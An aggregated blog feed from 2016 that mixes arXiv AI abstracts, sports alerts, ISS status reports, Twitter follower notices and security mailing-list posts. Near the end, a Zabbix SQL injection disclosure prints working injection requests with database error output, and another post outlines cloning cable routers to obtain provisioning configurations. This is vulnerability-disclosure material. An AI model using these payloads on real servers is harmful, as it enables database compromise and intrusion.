Scientists often run experiments to distinguish competing theories. This requires patience, rigor, and ingenuity - there is often a large space of possible experiments one could run. But we need not comb this space by hand - if we represent our theories as formal models and explicitly declare the space of experiments, we can automate the search for good experiments, looking for those with high expected information gain. Here, we present a general and principled approach to experiment design based on probabilistic programming languages (PPLs). PPLs offer a clean separation between declaring problems and solving them, which means that the scientist can automate experiment design by simply declaring her model and experiment spaces in the PPL without having to worry about the details of calculating information gain. We demonstrate our system in two case studies drawn from cognitive psychology, where we use it to design optimal experiments in the domains of sequence prediction and categorization. We find strong empirical validation that our automatically designed experiments were indeed optimal. We conclude by discussing a number of interesting questions for future research.



from cs.AI updates on arXiv.org http://ift.tt/2boE4wh
via IFTTT

Variational Information Maximizing Exploration. (arXiv:1605.09674v2 [cs.LG] UPDATED)

Scalable and effective exploration remains a key challenge in reinforcement learning (RL). While there are methods with optimality guarantees in the setting of discrete state and action spaces, these methods cannot be applied in high-dimensional deep RL scenarios. As such, most contemporary RL relies on simple heuristics such as epsilon-greedy exploration or adding Gaussian noise to the controls. This paper introduces Variational Information Maximizing Exploration (VIME), an exploration strategy based on maximization of information gain about the agent's belief of environment dynamics. We propose a practical implementation, using variational inference in Bayesian neural networks which efficiently handles continuous state and action spaces. VIME modifies the MDP reward function, and can be applied with several different underlying RL algorithms. We demonstrate that VIME achieves significantly better performance compared to heuristic exploration methods across a variety of continuous control tasks and algorithms, including tasks with very sparse rewards.



from cs.AI updates on arXiv.org http://ift.tt/1RKQdoC
via IFTTT

Bayesian Optimization with Dimension Scheduling: Application to Biological Systems. (arXiv:1511.05385v1 [stat.ML] CROSS LISTED)

Bayesian Optimization (BO) is a data-efficient method for global black-box optimization of an expensive-to-evaluate fitness function. BO typically assumes that computation cost of BO is cheap, but experiments are time consuming or costly. In practice, this allows us to optimize ten or fewer critical parameters in up to 1,000 experiments. But experiments may be less expensive than BO methods assume: In some simulation models, we may be able to conduct multiple thousands of experiments in a few hours, and the computational burden of BO is no longer negligible compared to experimentation time. To address this challenge we introduce a new Dimension Scheduling Algorithm (DSA), which reduces the computational burden of BO for many experiments. The key idea is that DSA optimizes the fitness function only along a small set of dimensions at each iteration. This DSA strategy (1) reduces the necessary computation time, (2) finds good solutions faster than the traditional BO method, and (3) can be parallelized straightforwardly. We evaluate the DSA in the context of optimizing parameters of dynamic models of microalgae metabolism and show faster convergence than traditional BO.



from cs.AI updates on arXiv.org http://ift.tt/1SWYNUt
via IFTTT

MLB: Orioles (66-52) host Red Sox (66-52) with both teams 1.5 games back in AL East race; watch live in the ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous notes left on bistro bike by mystery 'busybody'

Visit now for the latest Leith news - direct from the Edinburgh Evening News.

from Google Alert - anonymous http://ift.tt/2b1EswK
via IFTTT

Ravens: WR Steve Smith Sr. passes physical, activated off PUP list - multiple reports; tore Achilles in 2015 Week 8 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

The NSA Hack — What, When, Where, How, Who & Why? Explained Here...

You might have heard about the recent ongoing drama of NSA hack that has sparked a larger debate on the Internet concerning abilities of US intelligence agencies as well as their own security. Saturday morning the news broke that a mysterious group of hackers calling themselves "The Shadow Brokers" claimed it hacked an NSA-linked group and released some NSA hacking tools with a promise to


from The Hacker News http://ift.tt/2aZrPbn
via IFTTT

The NSA Hack — What, When, Where, How, Who & Why? Explained Here...

You might have heard about the recent ongoing drama of NSA hack that has sparked a larger debate on the Internet concerning abilities of US intelligence agencies as well as their own security. Saturday morning the news broke that a mysterious group of hackers calling themselves "The Shadow Brokers" claimed it hacked an NSA-linked group and released some NSA hacking tools with a promise to


from The Hacker News http://ift.tt/2bdFE2S
via IFTTT

ISS Daily Summary Report – 08/16/2016

Fluid Shifts Imaging with Chibis in the Service Module (SM): With ground team assistance, crewmembers continued the final week of this set of Fluid Shifts operations by configuring the Ultrasound 2 hardware prior to performing ultrasound scans in the SM while using the Chibis. The Fluids Shift investigation is divided into three segments: Dilution Measures, Baseline Imaging, and Baseline Imaging using the Russian Chibis Lower Body Negative Pressure (LBNP) device. The experiment measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures. Mouse Epigenetics Habitat Cage Unit Maintenance:  The food cartridges of Mouse Habitat Cage Units were exchanged and then the cage units containing the mice were transferred to and from the glove box located in the Cell Biology Experiment Facility (CBEF) to complete standard maintenance activities. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space.  Advanced Colloids Experiment Temperature control-1 (ACE-T1) Configuration: The crew accessed the Fluids Integrated Rack (FIR) and removed the Micro-channel Diffusion Plate and Bio Base from inside the Light Microscopy Module (LMM) Auxiliary Fluids Container (ACE) before installing the LMM Control Base, ACE Module, and Constrained Vapor Bubble (CVB) surveillance camera in preparation for the ACE-T1 experiment.  ACE-T-1 studies tiny suspended particles designed by scientists to connect themselves in a specific way to form organized structures in water. Materials having complex structures and unique properties potentially can be made with more knowledge of how these particles are joined together and the conditions which control their behaviors. The microgravity environment on the ISS provides researchers insight into the fundamental physics of micro particle self-assembly and the kinds of colloidal structures that are possible to fabricate. This in turn helps manufacturers on Earth in choosing which high-value material is worth investigating.  Combustion Integrated Rack (CIR) Fuel Oxidizer Management Assembly (FOMA) Calibration: The crew performed the FOMA Calibration by closing the bottle valves and relieving the pressure in the manifolds. The FOMA Calibration Unit (FCU) was powered to collect pressure transducer data with the bottle pressure transducers at ambient pressure and the rack was powered down. The crew then opened the bottle valves before closing up the rack. CIR provides sustained, systematic microgravity combustion research and it houses hardware capable of performing combustion experiments to further research of combustion in microgravity. Fine Motor Skills: A series of interactive tasks on a touchscreen tablet were completed for the Fine Motor Skills investigation. This investigation is critical during long-duration space missions, particularly those skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember’s fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment.  Habitability Human Factors Directed Observations: The crew recorded and submitted a narrated task video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.  Today’s Planned Activities All activities were completed unless otherwise noted. Soyuz 720 Kazbek Fit Check FLUID SHIFTS. Activation of РБС for Ultrasound Equipment / r/g 3076 FLUID SHIFTS. Ultrasound 2 Setup and Activation in SM Environmental Control & Life Support System (ECLSS) Tank Drain FLUID SHIFTS. Comm configuration for the experiment / r/g 9995 MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Memory Card pre-pack for return r/g 3078 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage Fine Motor Skills (FINEMOTR) Test Environmental Control & Life Support System (ECLSS) Recycle Tank Drain Part 2 METEOR Ops MOUSE Hardware Setup FIR Rack Doors Open FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 3085 FLUID SHIFTS. Chibis Setup / r/g 3085 WRS Recycle Tank Fill from EDV Crew Prep for PAO Light Microscopy Module (LMM). ACET1 Module Configuration DRAGON. Transfers FLUID SHIFTS. Ultrasound Ops in SM, Subject FLUID SHIFTS. Ultrasound 2 Scan, Operator Microbial Monitoring (RJR), Inspection of Surface Samples and Petri Dishes FLUID SHIFTS. Chibis Closeout Ops / r/g 3085 RS Photo Cameras Sync Up to Station Time / r/g 1594 FLUID SHIFTS. Deactivation of РБС and USND / r/g 3077 PAO Hardware Setup СОЖ Maintenance FIR Rack Door Close INTERP-MAI-75. HAM Radio Hardware Activation See note 5 r/g 3057 FLUID SHIFTS. CCFP hardware, HRF Laptop in SM FLUID SHIFTS. Crew Onboard Support System (КСПЭ) Hardware Deactivation and Closing Applications on CP SSC Combustion Integrated Rack (CIR) Valve Closure PAO Event FLUID SHIFTS. Restore nominal comm config WRS Recycle Tank Fill from EDV MRM2 comm config to support the P/L Ops FLUID SHIFTS. Ultrasound 2 Stowage in SM KULONOVSKIY KRISTALL. Experiment Ops r/g 3079 FLUID SHIFTS. Hardware Transfer to USOS Microbial Monitoring (RJR), Handover of SSK and MAS Samples Environmental Health System (EHS), Surface Sampler Kit (SSK) and Microbial Air Sampler (MAS) Sample Pack for return MRM2 Comm Reconfig for Nominal Ops WRS Recycle Tank Fill from EDV HABIT Video Recording XF305 Camcorder Settings Adjustment MOUSE Habitat Cage Unit Cleaning EVA Photo/Video Camera Config KULONOVSKIY KRISTALL. Copy and Downlink Data / r/g 3079 Environmental Control & Life Support System (ECLSS) Recycle Tank Fill Part 3 HABIT Task Video End DRAGON. Transfers HMS Defibrillator Inspection Symbolic Activity / r/g 3064 Distillate Filter & Purge Gas Filter Remove and Replace MOUSE. Transportation Cage Unit Preparation DRAGON. Cargo Transfer Tagup Symbolic Activity / r/g 3064 CIR Valve Open INTER-MAI-75. Equipment deactivation and cleanup / r/g 3057 In Flight Maintenance (IFM), Waste and Hygiene Compartment (WHC), Full Fill HABIT Camcorder […]

from ISS On-Orbit Status Report http://ift.tt/2b0NHAs
via IFTTT

Migrate losing anonymous user record

I've some user migration where I believe the anonymous user record is lost after some time. I cannot reproduce the exact steps, probably after rolling ...

from Google Alert - anonymous http://ift.tt/2bxJOT1
via IFTTT

I have a new follower on Twitter


Joan Carbonell
Several lifetimes of Projects + Learning + Sci-Fi + Family & Friends = obsession to inspire an amazing future. All opinions are my own.
Palma de Mallorca, Spain
http://t.co/sBlmpxRZuU
Following: 12573 - Followers: 14384

August 17, 2016 at 02:06AM via Twitter http://twitter.com/joancarbonell

I have a new follower on Twitter


Data Society
We envision a society where data science ignites conversations and collaboration across fields to solve problems we experience every day. #DataScienceEducation
Washington, DC
http://t.co/PvmdZct6VR
Following: 6940 - Followers: 9649

August 17, 2016 at 12:53AM via Twitter http://twitter.com/datasocietyco

Global Fires 2015-2016 B-Roll

B-roll for July 28 2016 live shot and interviews.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2b376PH
via IFTTT

Five Planets and the Moon over Australia


It is not a coincidence that planets line up. That's because all of the planets orbit the Sun in (nearly) a single sheet called the plane of the ecliptic. When viewed from inside that plane -- as Earth dwellers are likely to do -- the planets all appear confined to a single band. It is a coincidence, though, when several of the brightest planets all appear in nearly the same direction. Such a coincidence was captured just last week. Featured above, six planets and Earth's Moon were all imaged together last week, just before sunset, from Mornington Peninsula in Victoria, Australia. A second band is visible across the top of this tall image -- the central band of our Milky Way Galaxy. via NASA http://ift.tt/2bClNx6

Tuesday, August 16, 2016

I have a new follower on Twitter


Fiona Green
28 years in #sportsbiz now focusing on the use of #CRM and BI with sports rights holders to drive #fanengagement, participation, insight and revenue

http://t.co/rdzvQqzGha
Following: 3091 - Followers: 6396

August 16, 2016 at 10:51PM via Twitter http://twitter.com/fionagreen66

I have a new follower on Twitter


Robert Osborne
Husband, Father, and Water Resources Engineer with Black & Veatch.
South Carolina
http://t.co/vjx9j8NZep
Following: 1891 - Followers: 3375

August 16, 2016 at 10:22PM via Twitter http://twitter.com/watercrunch

I have a new follower on Twitter


Samiran Ghosh
APAC Tech Leader @DnBUS. Accidental Technologist. #CIO. #Digital Evangelist. Movie Buff. Love Comics & #SocialMedia. Guest Speaker. Blogger. All views personal
Global Citizen
https://t.co/47APw6b8Yy
Following: 4066 - Followers: 4662

August 16, 2016 at 09:51PM via Twitter http://twitter.com/samiranghosh

No-Hitter Watch: Orioles' Steve Pearce singles to break up Red Sox's Eduardo Rodriguez, Matt Barnes combine no-hitter (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

No-Hitter Watch: Red Sox's Eduardo Rodriguez and Matt Barnes have not allowed a hit through 6 innings vs. the Orioles (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

TerpreT: A Probabilistic Programming Language for Program Induction. (arXiv:1608.04428v1 [cs.LG])

We study machine learning formulations of inductive program synthesis; given input-output examples, we try to synthesize source code that maps inputs to corresponding outputs. Our aims are to develop new machine learning approaches based on neural networks and graphical models, and to understand the capabilities of machine learning techniques relative to traditional alternatives, such as those based on constraint solving from the programming languages community.

Our key contribution is the proposal of TerpreT, a domain-specific language for expressing program synthesis problems. TerpreT is similar to a probabilistic programming language: a model is composed of a specification of a program representation (declarations of random variables) and an interpreter describing how programs map inputs to outputs (a model connecting unknowns to observations). The inference task is to observe a set of input-output examples and infer the underlying program. TerpreT has two main benefits. First, it enables rapid exploration of a range of domains, program representations, and interpreter models. Second, it separates the model specification from the inference algorithm, allowing like-to-like comparisons between different approaches to inference. From a single TerpreT specification we automatically perform inference using four different back-ends. These are based on gradient descent, linear program (LP) relaxations for graphical models, discrete satisfiability solving, and the Sketch program synthesis system.

We illustrate the value of TerpreT by developing several interpreter models and performing an empirical comparison between alternative inference algorithms. Our key empirical finding is that constraint solvers dominate the gradient descent and LP-based formulations. We conclude with suggestions for the machine learning community to make progress on program synthesis.



from cs.AI updates on arXiv.org http://ift.tt/2blJAQd
via IFTTT

Free Lunch for Optimisation under the Universal Distribution. (arXiv:1608.04544v1 [math.OC])

Function optimisation is a major challenge in computer science. The No Free Lunch theorems state that if all functions with the same histogram are assumed to be equally probable then no algorithm outperforms any other in expectation. We argue against the uniform assumption and suggest a universal prior exists for which there is a free lunch, but where no particular class of functions is favoured over another. We also prove upper and lower bounds on the size of the free lunch.



from cs.AI updates on arXiv.org http://ift.tt/2bcuRWs
via IFTTT

Informal Physical Reasoning Processes. (arXiv:1608.04672v1 [cs.AI])

A fundamental question is whether Turing machines can model all reasoning processes. We introduce an existence principle stating that the perception of the physical existence of any Turing program can serve as a physical causation for the application of any Turing-computable function to this Turing program. The existence principle overcomes the limitation of the outputs of Turing machines to lists, that is, recursively enumerable sets. The principle is illustrated by productive partial functions for productive sets such as the set of the Goedel numbers of the Turing-computable total functions. The existence principle and productive functions imply the existence of physical systems whose reasoning processes cannot be modeled by Turing machines. These systems are called creative. Creative systems can prove the undecidable formula in Goedel's theorem in another formal system which is constructed at a later point in time. A hypothesis about creative systems, which is based on computer experiments, is introduced.



from cs.AI updates on arXiv.org http://ift.tt/2blJmsp
via IFTTT

A Shallow High-Order Parametric Approach to Data Visualization and Compression. (arXiv:1608.04689v1 [cs.AI])

Explicit high-order feature interactions efficiently capture essential structural knowledge about the data of interest and have been used for constructing generative models. We present a supervised discriminative High-Order Parametric Embedding (HOPE) approach to data visualization and compression. Compared to deep embedding models with complicated deep architectures, HOPE generates more effective high-order feature mapping through an embarrassingly simple shallow model. Furthermore, two approaches to generating a small number of exemplars conveying high-order interactions to represent large-scale data sets are proposed. These exemplars in combination with the feature mapping learned by HOPE effectively capture essential data variations. Moreover, through HOPE, these exemplars are employed to increase the computational efficiency of kNN classification for fast information retrieval by thousands of times. For classification in two-dimensional embedding space on MNIST and USPS datasets, our shallow method HOPE with simple Sigmoid transformations significantly outperforms state-of-the-art supervised deep embedding models based on deep neural networks, and even achieved historically low test error rate of 0.65% in two-dimensional space on MNIST, which demonstrates the representational efficiency and power of supervised shallow models with high-order feature interactions.



from cs.AI updates on arXiv.org http://ift.tt/2bctBme
via IFTTT

Evaluating Causal Models by Comparing Interventional Distributions. (arXiv:1608.04698v1 [cs.AI])

The predominant method for evaluating the quality of causal models is to measure the graphical accuracy of the learned model structure. We present an alternative method for evaluating causal models that directly measures the accuracy of estimated interventional distributions. We contrast such distributional measures with structural measures, such as structural Hamming distance and structural intervention distance, showing that structural measures often correspond poorly to the accuracy of estimated interventional distributions. We use a number of real and synthetic datasets to illustrate various scenarios in which structural measures provide misleading results with respect to algorithm selection and parameter tuning, and we recommend that distributional measures become the new standard for evaluating causal models.



from cs.AI updates on arXiv.org http://ift.tt/2blIQuD
via IFTTT

Learning values across many orders of magnitude. (arXiv:1602.07714v2 [cs.LG] UPDATED)

Most learning algorithms are not invariant to the scale of the function that is being approximated. We propose to adaptively normalize the targets used in learning. This is useful in value-based reinforcement learning, where the magnitude of appropriate value approximations can change over time when we update the policy of behavior. Our main motivation is prior work on learning to play Atari games, where the rewards were all clipped to a predetermined range. This clipping facilitates learning across many different games with a single learning algorithm, but a clipped reward function can result in qualitatively different behavior. Using the adaptive normalization we can remove this domain-specific heuristic without diminishing overall performance.



from cs.AI updates on arXiv.org http://ift.tt/1Qit6Cj
via IFTTT

Learning to Track at 100 FPS with Deep Regression Networks. (arXiv:1604.01802v2 [cs.CV] UPDATED)

Machine learning techniques are often used in computer vision due to their ability to leverage large amounts of training data to improve performance. Unfortunately, most generic object trackers are still trained from scratch online and do not benefit from the large number of videos that are readily available for offline training. We propose a method for offline training of neural networks that can track novel objects at test-time at 100 fps. Our tracker is significantly faster than previous methods that use neural networks for tracking, which are typically very slow to run and not practical for real-time applications. Our tracker uses a simple feed-forward network with no online training required. The tracker learns a generic relationship between object motion and appearance and can be used to track novel objects that do not appear in the training set. We test our network on a standard tracking benchmark to demonstrate our tracker's state-of-the-art performance. Further, our performance improves as we add more videos to our offline training set. To the best of our knowledge, our tracker is the first neural-network tracker that learns to track generic objects at 100 fps.



from cs.AI updates on arXiv.org http://ift.tt/1XkoPmu
via IFTTT

Multi-way Monte Carlo Method for Linear Systems. (arXiv:1608.04361v1 [cs.NA])

We study the Monte Carlo method for solving a linear system of the form $x = H x + b$. A sufficient condition for the method to work is $\| H \| < 1$, which greatly limits the usability of this method. We improve this condition by proposing a new multi-way Markov random walk, which is a generalization of the standard Markov random walk. Under our new framework we prove that the necessary and sufficient condition for our method to work is the spectral radius $\rho(H^{+}) < 1$, which is a weaker requirement than $\| H \| < 1$. In addition to solving more problems, our new method can work faster than the standard algorithm. In numerical experiments on both synthetic and real world matrices, we demonstrate the effectiveness of our new method.



from cs.AI updates on arXiv.org http://ift.tt/2biWRsM
via IFTTT

I have a new follower on Twitter


SPBMC PC
Sullivan Papain Block McGrath & Cannavo P.C. - New York, Long Island and New Jersey Personal Injury Lawyers.
New York, NY
http://t.co/Fq9LgMx6UG
Following: 53 - Followers: 25

August 16, 2016 at 04:44PM via Twitter http://twitter.com/SPBMCPC

Can Anonymous functions contain unknown variables?

Can Anonymous functions contain unknown variables?. Learn more about anonymous function, undefined variable.

from Google Alert - anonymous http://ift.tt/2aYp8RB
via IFTTT

Torza

There is an anonymous "Torza" on RISM that is described as a saltarello for lute. However, there is no incipit, so it is not possible to compare them to ...

from Google Alert - anonymous http://ift.tt/2bai1ZE
via IFTTT

Government vehicle accident in towson


via Instagram http://ift.tt/2bvGGWS

Someone is Spying on Researchers Behind VeraCrypt Security Audit

After TrueCrypt mysteriously discontinued itself, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, and privacy conscious people. Due to the huge popularity of VeraCrypt, security researchers from the OSTIF (The Open Source Technology Improvement Fund) announced at the beginning of this month that it had agreed to audit VeraCrypt


from The Hacker News http://ift.tt/2bfou2F
via IFTTT

Internet Traffic Hijacking Linux Flaw Affects 80% of Android Devices

An estimated 80 percent of Android smartphones and tablets running Android 4.4 KitKat and higher are vulnerable to a recently disclosed Linux kernel flaw that allows hackers to terminate connections, spy on unencrypted traffic or inject malware into the parties' communications. Even the latest Android Nougat Preview is considered to be vulnerable. <!-- adsense --> The security flaw was first


from The Hacker News http://ift.tt/2b9b76V
via IFTTT

ISS Daily Summary Report – 08/15/2016

Mouse Epigenetics Cage Unit Maintenance: The crew completed standard maintenance for the Mouse Epigenetics experiment by refilling the Transportation Cage Units and Mouse Habitat Cage Unit with water and checking the water nozzles of the individual cages. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. NanoRacks Platforms-1 Module Removal: Four NanoRacks Modules were removed from NanoRacks Platform 1 and installed in the Minus Eighty-degree Freezer for ISS (MELFI).  NanoRacks Modules 43 (Slime Mold), 44 (Awty-Yeast Cell Growth in a Microgravity Environment), 45 (Duchesne-Light Wavelengths on Algae Production), and 46 (Duchesne-Plant Growth Chamber) will remain in MELFI until they return on SpX-9. At Home in Space Questionnaire: The CDR completed a questionnaire for the At Home in Space investigation. This Canadian Space Agency (CSA) experiment assesses culture, values, and psychosocial adaptation of astronauts to a space environment shared by multinational crews on long-duration missions. It is hypothesized that astronauts develop a shared space culture that is an adaptive strategy for handling cultural differences and they deal with the isolated confined environment of the space craft by creating a home in space.  NeuroMapping Operations: The crew performed testing in both a “strapped in” and ”free floating” body configuration for this investigation which studies whether long-duration spaceflight causes changes to the brain, including brain structure and function, motor control, and multi-tasking abilities. It also measures how long it would take for the brain and body to recover from possible changes. Previous research and anecdotal evidence from astronauts suggests movement control and cognition can be affected in microgravity. The NeuroMapping investigation performs structural and functional magnetic resonance brain imaging (MRI and fMRI) to assess any changes that occur after spending months on the ISS. Fluid Shifts Hardware Transfer and Service Module Setup: To prepare for Ultrasound activities in the Service Module (SM) this week, the crew transferred and set up hardware that supports the Fluid Shifts investigation from the Russian Segment. The experiment measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures.  Fine Motor Skills: A series of interactive tasks on a touchscreen tablet was completed for the Fine Motor Skills investigation which tests skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember’s fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment.  Extravehicular Activity (EVA) Preparations: The crew completed a procedures review in preparation for next Friday’s planned International Docking Adapter (IDA)2 EVA. Topics covered included prebreathe protocol review, Equipment Lock activities and suit donning plan, egress/ingress plan and EVA extension considerations. Following the review the crew participatet in a debrief with ground teams to discuss questions or concerns. The crew also verified that the Extravehicular Mobility Unit (EMU) glove heaters are functional and that the EMU TV is receiving power from the Rechargeable EVA Battery Assembly (REBA). Waste and Hygiene Compartment (WHC): This morning the crew reported the WHC fan powered off during use which was followed by a “Check Separator Light” illumination. The crew performed the standard troubleshooting procedure to clear the Check Separator Light. The WHC was returned to normal use upon completion of the malfunction procedure.  Additionally, the crew reported they have been seeing the “Check Separator Light” on previous use. The engineering team has scheduled a coordination meeting tomorrow to discuss these developments. Mobile Servicing System (MSS) Mobile Transporter (MT) Translation:  Today, ground controllers moved the MSS MT from work station 4 to workstation 6 in preparation for the removal of IDA2 from the SpaceX-9 trunk on Wednesday, and the installation of IDA2 onto PMA2 during the EVA on Friday. LA Multiplexer/De-multiplexer (MDM) Patch – Ground Controllers successfully loaded a patch to the LA 1 MDM in preparation for IDA installation. Payload MDM Transition – Ground Controllers were performing a scheduled PLMDM-2 High Rate Data Link (HRDL) reset which resulted in a complete lockup of the PLMDM-2 HRDL card.  To recover from the HRDL card lockup, ground controllers performed a PLMDM transition.  PLMDM-1 was subsequently powered ON and reconfigured as the primary PLMDM.  All payload Health and Status (H&S) indications pre- and post-recovery were nominal.  The PLMDM transition resulted in a loss of Health and Status for ~57 minutes.  Today’s Planned Activities All were completed unless otherwise noted. Install 17КС.2076А-0 case onto SM ПрК thermal control pipework r/g 3003 FINEMOTR – science ops run. Video equipment installation for БД-2 exercise video shooting / r/g 2071 Replace MRM2;s [ПФ1], [ПФ2] dust filters and [В1], [B2] fan grids On MCC Go test БД-2 БД-2 exercise – 3 MOUSE – h/w setup DRAGON. Cargo transfer ops WRS – water sample analysis XF305 camcorder setup EVA procedures’ final printout MOUSE – module water replacement MRM2 [ВД1] & [ВД2] air ducts vacuuming Video equipment de-installation for БД-2 exercise video shooting r/g 2071 Mouse Epigenetics – Habitat 4 cleaning and Micro-G battery R&R, part 1 АСУ’s [Е-К] container and hose R&R. Post-R&R АСУ activation / r/g 3061 DAN. Science Ops run r/g 2780 EVA procedure reviews INTER-MAI-75.  [РЛС] h/w setup and activation. Refer to comment 6 r/g 3057 On-orbit life photography and video / r/g 2747 DAN. Science Ops run r/g 2780 Review EVA-related IDA installation procedure  AHIS. Questionnaire fill-up FLUID SHIFTS. Equipment transfer to ROS. FLUID SHIFTS. Ultrasound 2 hardware install in SM Equipment preparation for PAO in LAB FLUID SHIFTS. Ultrasound equipment connection to [РБС] / r/g 3054 Crew preparation for PAO / r/g 3060 PAO with Pyaty Element Project team r/g 3060 Mouse Epigenetics – Habitat 4 cleaning and Micro-G battery R&R, part 2 NMAP – […]

from ISS On-Orbit Status Report http://ift.tt/2aQYRco
via IFTTT

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

I actually ended up finding this vuln in a different vector (in the profileIdx2 parameter). /zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2’3297&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
Timestamp Value
No data found.
  • Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
  • Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime', '20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
  • Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
Similarly, it requires auth unless you enable Guest. > On Aug 11, 2016, at 7:23 PM, 1n3@hushmail.com wrote: > > ========================================= > Title: Zabbix 3.0.3 SQL Injection Vulnerability > Product: Zabbix > Vulnerable Version(s): 2.2.x, 3.0.x > Fixed Version: 3.0.4 > Homepage: http://www.zabbix.com > Patch link: http://ift.tt/2aSpydV > Credit: 1N3@CrowdShield > ========================================== > > > Vendor Description: > ===================== > Zabbix is an open source availability and performance monitoring solution. > > > Vulnerability Overview: > ===================== > Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page. > > > Business Impact: > ===================== > By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system. > > Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure. > > Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated. > > > Proof of Concept: > ===================== > > latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1 > > Result: > SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1) > latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185 > > > Disclosure Timeline: > ===================== > > 7/18/2016 - Reported vulnerability to Zabbix > 7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public > 7/22/2016 - Zabbix released patch for vulnerability > 8/3/2016 - CVE details submitted > 8/11/2016 - Vulnerability details disclosed > > >

Source: Gmail -> IFTTT-> Blogger

[FD] Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass

[FD] German Cable Provider Router (In)Security

Hey Guys, im not sure if this is a new point. But i´m thinking about a possible security hole by design which exists at maybe many (german) cable providers. German cable providers like Unitymedia/Kabel Deutschland provides u a Fritzbox or any other Cable-Router for internet access. As you know, this routers have a mac-address on every Interface like on wifi, ethernet and so on. By default, the Wifi-SSID is public available. The SSID gives you he MAC to the wifi-iface, right? If so, then you can calculate the MAC of the other Interfaces by adding or substracting the last oktekt by one or maybe two. So, my theory: If you are able to fetch the SSID by wardriving, you should also get the MAC of the other interfaces, especialy of the cable-interface. Means: you should be able to calc the MAC of any interface of the device. If so: With a hardware debug interface you should be able to modify the firmware of a router like the well known Fritzbox. This should enable you the possibilty to modifiy the MAC of the interfaces. When im Right, then it must be easy by simply do some wardriving and collection some SSID´s from this provider. With this fetched and public available data i should be able to clone a Fritzbox. As i know, routers like the Fritbox get provisioned by the TR069 protocol. This means, the router Identifies it selfs via MAC against a TR069 provisioning-server to get its configuration on the first Contact. So with this in mind, i should be able to clone the router, identify against at an TR069 Server, grab the config from the TR069 provisioning-server and setup a clone oft he official customer router. Am i right or do miss something in this idea??? Mit freundlichen Grüßen, Sebastian Michel

Source: Gmail -> IFTTT-> Blogger

[FD] Executable installers are vulnerable^WEVIL (case 39): MalwareBytes' "junkware removal tool" allows escalation of privilege

[FD] Actiontec T2200H (Telus Modem) Root Reverse Shell

